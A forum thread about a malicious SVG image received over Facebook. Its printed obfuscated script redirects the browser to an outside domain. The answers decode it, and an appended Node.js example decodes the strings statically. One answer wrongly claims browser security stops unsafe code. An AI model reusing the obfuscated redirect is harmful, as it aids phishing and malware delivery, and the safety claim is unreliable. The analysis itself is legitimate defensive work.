JavaScript
pmozil, 2016-11-22 00:50:45

Can you help me decipher the virus script that is hidden in the SVG image?

I received a message on Facebook with an attached picture, "photo1323.svg".
I downloaded this image, and I think that this addressee may know about the scalable vector graphics markup language. And then I remembered that SVG supports JavaScript, which is used to make animations.
I opened it in Notepad and could not make out a single function or a single parameter, as if it had been generated somehow rather than written by a person.
Here is the script:

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
  <circle cx="250" cy="250" r="50" fill="red" />
  <script type="text/javascript"><![CDATA[
    function vuoelw(buegk, npydu, qcpfy) {
for (var coicer = "RNc0gAnrjv:T.fB29yEad6C=zJ1VUHblu_/PohGYOSL4mX7I3iZeFs?tp85KDkMx", yfckcd = ["rFgU_p5MvhOb=JuozHiSxYm4kE8j1.36l7cDaLey9ns0V:TRfINtXZ\/K2PAd?CGB","mOL?_1HSVZeB7rNyYpR39ghb0C\/DcuEiX8:6f=s.G4JxIdPoTjUta5lkKnAMF2vz","GN3EmAoHVfMLFUT06v\/27aB9cugZPxJdKhr5SI1:Y?tz4ln8kRCbD.j_y=espXOi",":B7eDtUHjbCY1ILTM\/2PmhSuNc_lxJO4E.GosFdy0ag83k5zRp?rnv69VifZ=KAX",".0hbvERV6kyHS8_zlX=GBmtMZ5c?NYO9\/4LJFUon7spr3CiKeDagTdfj1P2Au:Ix"], whsht = "", xrjrt = 0; yfckcd[xrjrt];) xrjrt++;
for (var gkvyro = 0; buegk[gkvyro];) {
  for (var gnjnvt = 0, gnntty = -1; coicer[gnjnvt];) {
    if (coicer[gnjnvt] == buegk[gkvyro]) {
      gnntty = gnjnvt;
      break
    }
    gnjnvt++
  }
  if (gnntty >= 0) {
    for (var qcucm = 0, awducq = -1; yfckcd[gkvyro % xrjrt][qcucm];) {
      if (yfckcd[gkvyro % xrjrt][qcucm] == buegk[gkvyro]) {
        awducq = qcucm;
        break
      }
      qcucm++
    }
    whsht += coicer[awducq]
  } else whsht += buegk[gkvyro];
  gkvyro++
}
var hswos = "";
for (nfegz = npydu; nfegz < whsht.length; nfegz++) hswos += whsht[nfegz];
return whsht = hswos
}

  var ofqwly = window;
  var lmktar = vuoelw("kwfIjaK",4,true);
  var nzbeu = vuoelw("qjiq9aL29DaH",4,true);
  var ndgexl = vuoelw("JqmD85KbmRLfSwUMtU",14,true);
  ofqwly[lmktar][nzbeu][ndgexl] = vuoelw("2IcVUKkyCLcpRUdtwb1/Z:dshSkRsR=KIV",4,false);
  ]]></script>
</svg>

So the question is:
What does this script do?


2 answer(s)
Peter, 2016-11-22
@pmozil

Pull out the script and paste it into a blank page or jsfiddle.net in Chrome.
Add debugger; as the first line.
Open the developer console and execute it command by command. It becomes clear how it works.
The browser's security policy will not allow code that is not safe to be executed.

Kovalsky, 2016-11-22
@lazalu68

This is what it does:
window.top.location.href = 'http://yinsewe.us/location.php';

The function performs some kind of complex decoding; I did not waste time on parsing it. The Daedric-looking lmktar, nzbeu and ndgexl store the top, location and href keys respectively.
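
The strings reported in the answer above can also be recovered statically, without loading the sample in a browser. The following is an added example, not part of the original thread: a readable Node.js reimplementation of the vuoelw decoder that reads the call sites as plain text and never evaluates the script. The names decode, recoverStrings, BASE, ALPHABETS and SAMPLE are introduced here for illustration.

```javascript
// Position-keyed substitution used by the sample: the character at index i is
// looked up in ALPHABETS[i % 5] and replaced by the character at the same
// index in BASE. Characters absent from BASE (such as "w" and "q") pass through.
const BASE = "RNc0gAnrjv:T.fB29yEad6C=zJ1VUHblu_/PohGYOSL4mX7I3iZeFs?tp85KDkMx";
const ALPHABETS = [
  "rFgU_p5MvhOb=JuozHiSxYm4kE8j1.36l7cDaLey9ns0V:TRfINtXZ/K2PAd?CGB",
  "mOL?_1HSVZeB7rNyYpR39ghb0C/DcuEiX8:6f=s.G4JxIdPoTjUta5lkKnAMF2vz",
  "GN3EmAoHVfMLFUT06v/27aB9cugZPxJdKhr5SI1:Y?tz4ln8kRCbD.j_y=espXOi",
  ":B7eDtUHjbCY1ILTM/2PmhSuNc_lxJO4E.GosFdy0ag83k5zRp?rnv69VifZ=KAX",
  ".0hbvERV6kyHS8_zlX=GBmtMZ5c?NYO9/4LJFUon7spr3CiKeDagTdfj1P2Au:Ix",
];

// `skip` is the count of leading junk characters the sample throws away.
// The sample's third argument (true/false) is never read, so it is omitted.
function decode(encoded, skip) {
  let out = "";
  for (let i = 0; i < encoded.length; i++) {
    const ch = encoded[i];
    if (!BASE.includes(ch)) { out += ch; continue; }   // pass-through
    const idx = ALPHABETS[i % ALPHABETS.length].indexOf(ch);
    out += idx >= 0 ? BASE[idx] : "?";                 // "?" marks a lookup miss
  }
  return out.slice(skip);
}

// Input for the example: the four call sites copied from the script in the
// question, held as inert text.
const SAMPLE = `
  var lmktar = vuoelw("kwfIjaK",4,true);
  var nzbeu = vuoelw("qjiq9aL29DaH",4,true);
  var ndgexl = vuoelw("JqmD85KbmRLfSwUMtU",14,true);
  ofqwly[lmktar][nzbeu][ndgexl] = vuoelw("2IcVUKkyCLcpRUdtwb1/Z:dshSkRsR=KIV",4,false);
`;

// Finds each vuoelw("...", n, ...) call with a regular expression and decodes
// its string literal. Nothing from the sample is executed.
function recoverStrings(source, fn = "vuoelw") {
  const call = new RegExp(fn + '\\(\\s*"([^"]*)"\\s*,\\s*(\\d+)', "g");
  return [...source.matchAll(call)].map(m => decode(m[1], Number(m[2])));
}

console.log(recoverStrings(SAMPLE));
```

Run under Node.js, this lists the three property names and the redirect target in call order, matching the assignment given in the answer above.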
